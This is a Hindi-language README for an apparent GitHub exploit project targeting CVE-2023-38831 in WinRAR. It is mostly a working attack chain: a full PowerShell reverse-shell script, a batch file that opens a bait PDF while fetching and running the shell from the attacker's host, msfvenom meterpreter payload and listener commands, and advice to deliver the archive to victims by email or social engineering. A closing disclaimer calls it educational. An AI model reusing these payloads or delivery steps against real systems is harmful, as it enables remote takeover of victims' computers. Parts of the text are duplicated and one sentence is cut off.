
इस प्रोजेक्ट में एक Python स्क्रिप्ट है जो **CVE-2023-38831** का शोषण करती है, जो **WinRAR** के 6.23 से पहले के संस्करणों में एक भेद्यता है। यह शोषण एक **दुर्भावनापूर्ण RAR संग्रह** तैयार करता है, जो पीड़ित द्वारा संग्रह के भीतर एक हानिरहित दिखने वाली फ़ाइल (जैसे PDF) खोलने पर मनमाने कोड के निष्पादन को ट्रिगर करता है।
technical_corpयह प्रोजेक्ट एक Python स्क्रिप्ट है जो CVE-2023-38831 का शोषण करती है, यह WinRAR के 6.23 से पहले के संस्करणों में एक कमजोरी है। यह शोषण एक दुर्भावनापूर्ण RAR संग्रह उत्पन्न करता है जो पीड़ित द्वारा संग्रह के अंदर एक हानिरहित दिखने वाली फ़ाइल (जैसे PDF) खोलने पर मनमाना कोड निष्पादन को ट्रिगर करता है। यह कमजोरी अप्रैल से अगस्त 2023 तक सक्रिय रूप से शोषित की गई थी।
CVE-2023-38831 WinRAR में एक कमजोरी है जो हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है जब पीड़ित एक संग्रह खोलता है जिसमें एक हानिरहित फ़ाइल और एक दुर्भावनापूर्ण फ़ोल्डर एक ही नाम के साथ होता है। जब उपयोगकर्ता हानिरहित फ़ाइल के साथ इंटरैक्ट करता है, तो WinRAR गलती से दुर्भावनापूर्ण फ़ोल्डर की सामग्री को संसाधित करता है और हमलावर के पेलोड को निष्पादित करता है।
.bat या .exe फ़ाइल) होता है।git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
cd CVE-2023-38831-Exploit
हम एक .rar संग्रह में एम्बेडेड बैच फ़ाइल का उपयोग करके एक होस्टेड PowerShell रिवर्स शेल को डाउनलोड और निष्पादित करेंगे।
PowerShell रिवर्स शेल स्क्रिप्ट बनाएं:
अपनी Kali Linux मशीन पर निम्न PowerShell स्क्रिप्ट को reverse.ps1 के रूप में सहेजें:
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()
<attacker_ip> को अपनी Kali Linux मशीन के IP से बदलें।
<attacker_port> को उस पोर्ट नंबर से बदलें जिस पर आप सुनेंगे।
अपनी Kali Linux मशीन पर PowerShell स्क्रिप्ट होस्ट करें:
उस फ़ोल्डर पर जाएँ जहाँ PowerShell स्क्रिप्ट सहेजी गई है:
cd /path/to/powershell-script
फ़ाइल को पोर्ट 80 पर होस्ट करने के लिए Python के HTTP सर्वर का उपयोग करें:
python3 -m http.server 80
इससे reverse.ps1 http://<attacker_ip>/reverse.ps1 पर उपलब्ध हो जाएगा।
एक बैच फ़ाइल (script.bat) बनाएं जो PowerShell रिवर्स शेल को डाउनलोड और निष्पादित करेगी:
@echo off
:: Open the legitimate PDF
start bait.pdf
:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit
बैच फ़ाइल को एम्बेड करने के लिए CVE-2023-38831 शोषण स्क्रिप्ट का उपयोग करें:
एक वैध PDF में बैच फ़ाइल को एम्बेड करने के लिए WinRAR शोषण स्क्रिप्ट चलाएँ:
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar
यह कमांड POC.rar फ़ाइल बनाता है, जिसमें script.bat होता है जो रिवर्स शेल को निष्पादित करेगा।
रिवर्स शेल को पकड़ने के लिए Netcat लिसनर शुरू करें:
nc -lvnp <attacker_port>
जैसे ही पीड़ित POC.rar खोलता है और PDF फ़ाइल निष्पादित करता है, script.bat ट्रिगर हो जाएगा। स्क्रिप्ट आपके सर्वर से PowerShell रिवर्स शेल डाउनलोड और निष्पादित करेगी। आपको अपने Netcat लिसनर पर एक रिवर्स शेल कनेक्शन प्राप्त होगा।
एक पेलोड उत्पन्न करें (यदि Metasploit का उपयोग कर रहे हैं): आप msfvenom का उपयोग करके एक रिवर्स शेल पेलोड बना सकते हैं:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
बनाई गई payload.exe फ़ाइल को CVE-2023-WinRAR-Exploit निर्देशिका में ले जाएँ
शोषण जनरेटर चलाएँ: एक दुर्भावनापूर्ण RAR फ़ाइल उत्पन्न करने के लिए Python स्क्रिप्ट चलाएँ:
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar
-b: चारा फ़ाइल निर्दिष्ट करें (जैसे, nmapcheatsheet.pdf)। -p: पेलोड फ़ाइल निर्दिष्ट करें (जैसे, script.bat या payload.exe)। -o: आउटपुट फ़ाइल नाम निर्दिष्ट करें (जैसे, POC.rar)।
पीड़ित को RAR फ़ाइल वितरित करें: उत्पन्न malicious_archive.rar को सोशल इंजीनियरिंग, ईमेल अटैचमेंट या फ़ाइल-शेयरिंग प्लेटफॉर्म के माध्यम से पीड़ित तक पहुँचाया जा सकता है।
एक लिसनर सेट अप करें (यदि Metasploit का उपयोग कर रहे हैं): अपनी हमलावर मशीन पर, रिवर्स शेल को पकड़ने के लिए एक लिसनर सेट अप करें:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस शोषण के किसी भी दुरुपयोग की जिम्मेदारी नहीं लेता है। इसका उपयोग केवल अधिकृत वातावरण या पूर्ण सहमति के साथ पैठ परीक्षण परिदृश्यों में किया जाना चाहिए।